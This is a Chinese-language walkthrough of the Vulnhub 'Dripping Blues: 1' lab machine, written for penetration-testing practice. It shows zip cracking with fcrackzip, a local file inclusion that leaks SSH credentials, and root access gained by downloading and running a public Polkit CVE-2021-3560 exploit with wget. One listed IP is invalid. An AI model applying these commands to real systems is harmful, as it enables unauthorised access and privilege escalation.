Vulnhub 靶场 DRIPPING BLUES: 1

前期准备：

靶机地址：https://www.vulnhub.com/entry/dripping-blues-1,744/

kali攻击机ip：192.168.60.128
靶机地址：192.168.660.138

注：这个靶机有坑，别钻死胡同。

一、信息收集

1.使用nmap对目标靶机进行扫描

发现开放了 21、22和80端口。

2. 21端口

匿名登录：

是个zip，下载下来看一下：

发现有密码，那就爆破一下：

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip

说注意 “dirp“ ，暂时没明白什么意思，secret.zip 压缩包也没爆破出来。

3. 80端口

说 drippingblues 又被黑了，现在是 drippingblues。并且有两个可疑用户名：travisscott & thugger。

nmap 的扫描中发现 80 端口下有 robots.txt 文件：

给了两个目录：

/dripisreal.txt

说是看看这个页面里的歌词，然后就得到了ssh密码，研究半天，放弃了，果然还是理科好，语言文字太难

二、漏洞利用

另一个目录是 /etc/dripispowerful.html，在 /etc 下，应该有文件包含，扫一下目录：

猜测应该是提示 文件包含漏洞，可以查看任意文件，我们用fuzz跑一下关键词，没跑出来，回想“just focus on "drip" ” 尝试一下，没想到真的是drip

http://192.168.60.138/index.php?drip=/etc/dripispowerful.html

成功获取一个密码，尝试ssh登录

查看源码发现密码，应该是用户 thugger 的， thugger:imdrippinbiatch。ssh 登录：

登陆成功。查看文件：

发现一个 flag： 5C50FC503A2ABE93B4C5EE3425496521

三、提权

卡了很长时间，没办法，查询了一下其他大哥的博客，有这样一个路子：

查看其他文件和权限都没有什么发现可利用的地方，查看下进程：

发现 polkitd，

在 github 上找到了它的提权漏洞

下载 CVE-2021-3560.py，赋权并运行：

wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
chmod +x CVE-2021-3560.py
python3 CVE-2021-3560.py

得到 root 权限，查看 flag：78CE377EF7F10FF0EDCA63DD60EE63B8